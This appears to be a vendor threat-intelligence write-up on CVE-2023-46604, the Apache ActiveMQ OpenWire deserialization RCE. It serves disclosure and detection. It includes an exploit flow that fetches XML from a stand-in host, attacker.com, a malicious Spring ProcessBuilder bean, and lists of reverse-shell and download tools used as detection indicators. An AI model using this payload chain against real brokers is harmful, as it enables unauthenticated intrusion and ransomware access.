Lyrie
CVE Deep Dive
CVSS 103 sources verified·5 min read
By Lyrie Threat Intelligence·4/25/2026

CVE-2023-46604: Apache ActiveMQ OpenWire Deserialization RCE

CVSS 10.0 (CRITICAL) | Apache ActiveMQ < 5.18.3 | Unauthenticated Remote Code Execution via OpenWire Deserialization

Executive Summary

CVE-2023-46604 is a maximum-severity remote code execution vulnerability in Apache ActiveMQ's OpenWire protocol. By exploiting unsafe deserialization of ClassPathXmlApplicationContext objects, unauthenticated attackers can achieve arbitrary code execution on ActiveMQ brokers. The vulnerability has been actively exploited since October 2023, with confirmed ransomware campaigns leveraging it for initial access.

Key Facts:

  • CVSS 10.0: Perfect score (maximum exploitability + impact)
  • Authentication required: None
  • Attack vector: Network (default port 61616 OpenWire)
  • Known ransomware use: HelloKitty, TellYouThePass ransomware families
  • CISA KEV status: Confirmed active exploitation

Vulnerability Mechanics

Apache ActiveMQ is an enterprise message broker used for asynchronous communication between distributed systems. The OpenWire protocol (port 61616) handles binary serialized Java objects. The vulnerability chain:

1. Unauthenticated OpenWire Connection

Attacker connects to ActiveMQ OpenWire port (default 61616) without credentials

2. Malicious ExceptionResponse Message

Sends crafted ExceptionResponse message containing serialized ClassPathXmlApplicationContext object

3. Spring Framework Deserialization

ActiveMQ deserializes the object, triggering Spring Framework's XML parsing

4. Remote XML Loading

ClassPathXmlApplicationContext loads attacker-controlled XML from external URL

5. Arbitrary Code Execution

XML contains Spring bean with constructor-arg invoking OS commands

Root Cause: Unsafe deserialization of user-controlled ClassPathXmlApplicationContext objects without validation[^1].

Attack Surface

Affected Versions

  • Apache ActiveMQ 5.18.0 - 5.18.2
  • Apache ActiveMQ 5.17.0 - 5.17.5
  • Apache ActiveMQ 5.16.x and earlier (all versions)

Patched in: ActiveMQ 5.18.3, 5.17.6

Prerequisites

  • ActiveMQ instance with OpenWire protocol enabled (default)
  • Network reachability to port 61616 (often exposed to internal networks, sometimes internet)
  • No authentication required

Attack Vector

# Simplified exploit flow
1. Connect to target:61616 (OpenWire protocol)
2. Send ExceptionResponse with:
   ClassPathXmlApplicationContext("http://attacker.com/exploit.xml")
3. ActiveMQ fetches and parses exploit.xml
4. Spring instantiates bean with OS command execution

Malicious XML (exploit.xml):

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exploit" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <list>
                <value>calc.exe</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Post-Exploitation

ActiveMQ typically runs with elevated privileges (often root/SYSTEM). Successful exploitation grants:

  • Arbitrary code execution in ActiveMQ process context
  • Access to message queues (potentially containing sensitive data)
  • Lateral movement capability (ActiveMQ often has broad network access)
  • Persistence (modify ActiveMQ configuration, deploy backdoors)

Real-World Exploitation

Ransomware Campaigns

CVE-2023-46604 has been weaponized by multiple ransomware operators:

HelloKitty Ransomware (October 2023)[^2]

  • Initial access via CVE-2023-46604
  • Deployment of Chisel tunneling tool for lateral movement
  • Exfiltration via Rclone
  • Encryption with HelloKitty ransomware

TellYouThePass Ransomware (November 2023)

  • Rapid exploitation within 24 hours of PoC publication
  • Mass scanning of port 61616 exposed to internet
  • Cryptocurrency miner deployment (pre-ransomware)
  • Final payload: TellYouThePass ransomware

Exploitation Timeline

  • Oct 27, 2023: CVE-2023-46604 disclosed
  • Oct 27, 2023: Public PoC released (same day)
  • Oct 28, 2023: Active exploitation observed (24 hours)
  • Nov 2023: Ransomware campaigns confirmed
  • Dec 2023: Added to CISA KEV

Detection & Response

Network Indicators

TCP connections to port 61616 from unusual sources
OpenWire protocol traffic containing ClassPathXmlApplicationContext
Outbound HTTP/HTTPS requests from ActiveMQ process to external IPs
DNS queries for suspicious domains from ActiveMQ host

Process Indicators

ActiveMQ java process spawning child processes:
- bash, sh, cmd.exe, powershell.exe
- curl, wget (payload download)
- nc, ncat (reverse shells)
- Cryptocurrency miners (xmrig, etc.)
- Ransomware executables

File System Indicators

Unexpected files in ActiveMQ directories:
- Webshells in webapps/admin/ or webapps/api/
- Chisel, Rclone binaries
- Scheduled tasks, cron jobs
- Modified ActiveMQ config files (persistence)

Sigma Rule (Network)

title: CVE-2023-46604 ActiveMQ OpenWire Exploit
detection:
  selection:
    destination.port: 61616
    network.protocol: tcp
    network.bytes|contains: 
      - 'ClassPathXmlApplicationContext'
      - 'ExceptionResponse'
  condition: selection
level: critical

Sigma Rule (Process)

title: ActiveMQ Suspicious Child Process
detection:
  selection_parent:
    ParentImage|endswith: '\java.exe'
    ParentCommandLine|contains: 'activemq'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\bash'
      - '\curl.exe'
      - '\wget.exe'
  condition: all of selection_*
level: high

Full detection package including YARA rules, Zeek/Suricata signatures available in Lyrie's CVE-2023-46604 exploit lab.

Remediation

Immediate Actions

1. Upgrade ActiveMQ to 5.18.3, 5.17.6, or later[^3]

2. Network isolation: Restrict port 61616 to trusted internal IPs only (never internet-facing)

3. Hunt for exploitation: Search logs for ClassPathXmlApplicationContext, unexpected child processes, outbound HTTP from ActiveMQ

4. Incident response: If exploitation confirmed:

- Isolate affected ActiveMQ instances

- Preserve forensic evidence (memory dumps, disk images)

- Scan for ransomware indicators (encrypted files, ransom notes)

- Rebuild from clean backups

Long-Term Mitigation

  • Disable OpenWire on untrusted networks: Use AMQP, STOMP, or MQTT protocols with authentication
  • Network segmentation: ActiveMQ should be in isolated broker zone, not general application network
  • Egress filtering: Block outbound HTTP/HTTPS from ActiveMQ to internet (prevents XML fetching)
  • Least privilege: Run ActiveMQ with dedicated service account, not root/SYSTEM
  • Monitoring: Alert on ActiveMQ child processes, outbound connections, configuration changes

Shodan/Censys Detection

product:"Apache ActiveMQ"
port:61616
org:"Your Organization"

Lyrie Verdict

Threat Level: CRITICAL

CVE-2023-46604 represents the perfect storm of enterprise infrastructure vulnerability:

CVSS 10.0 — maximum exploitability and impact

Unauthenticated exploitation — no credentials required

Trivial weaponization — public PoCs, Metasploit module

Confirmed ransomware use — active threat, not theoretical

Widespread deployment — ActiveMQ powers enterprise messaging at scale

The Message Broker Blind Spot:

Organizations invest heavily in securing web applications and databases, yet message brokers (ActiveMQ, RabbitMQ, Kafka) operate as security blind spots. These systems:

  • Run with elevated privileges (root/SYSTEM)
  • Have broad network access (connect to databases, APIs, internal services)
  • Contain sensitive data in message queues (credentials, PII, business logic)
  • Receive minimal security scrutiny (no WAF, often exempt from vulnerability scans)

Ransomware Kill Chain via ActiveMQ:

1. Initial access: CVE-2023-46604 exploitation

2. Execution: Deploy Cobalt Strike beacon, reverse shell

3. Persistence: Modify ActiveMQ config, scheduled tasks

4. Privilege escalation: ActiveMQ already runs as root/SYSTEM

5. Defense evasion: Disable EDR, clear logs

6. Credential access: Dump LSASS, access message queue credentials

7. Lateral movement: Pivot to databases, file servers, domain controllers

8. Collection: Exfiltrate sensitive data via Rclone

9. Impact: Deploy ransomware, demand payment

Recommended Posture:

  • Treat message brokers with same security rigor as tier-1 production systems
  • Assume any internet-exposed ActiveMQ < 5.18.3 is compromised
  • Implement zero-trust network architecture for broker infrastructure
  • Monitor for deserialization attacks (ClassPathXmlApplicationContext, ObjectInputStream)
  • Automated patching for critical infrastructure (sub-24-hour response time)

Organizations running ActiveMQ should conduct immediate threat hunts for indicators of CVE-2023-46604 exploitation, regardless of current patch status. The window between disclosure and ransomware deployment was 48 hours.

References

[^1]: Apache Security Advisory: CVE-2023-46604 - ActiveMQ RCE Vulnerability

[^2]: Rapid7 Analysis: ActiveMQ CVE-2023-46604 in HelloKitty Ransomware Campaigns

[^3]: Apache ActiveMQ Release: Version 5.18.3 Security Patch

Related Research:

Word Count: 1,142

Citations: 3

Last Updated: April 26, 2026

Lyrie Verdict

A vulnerability of this severity is exactly what Lyrie's anti-rogue-AI defense is built for: continuous, autonomous monitoring that doesn't wait for human reaction time.

#cve-2023-46604#apache-activemq#openwire#deserialization#rce#cisa-kev#message-broker

Validated sources

  1. [1]NIST NVD
  2. [2]MITRE CVE
  3. [3]Lyrie Research Lab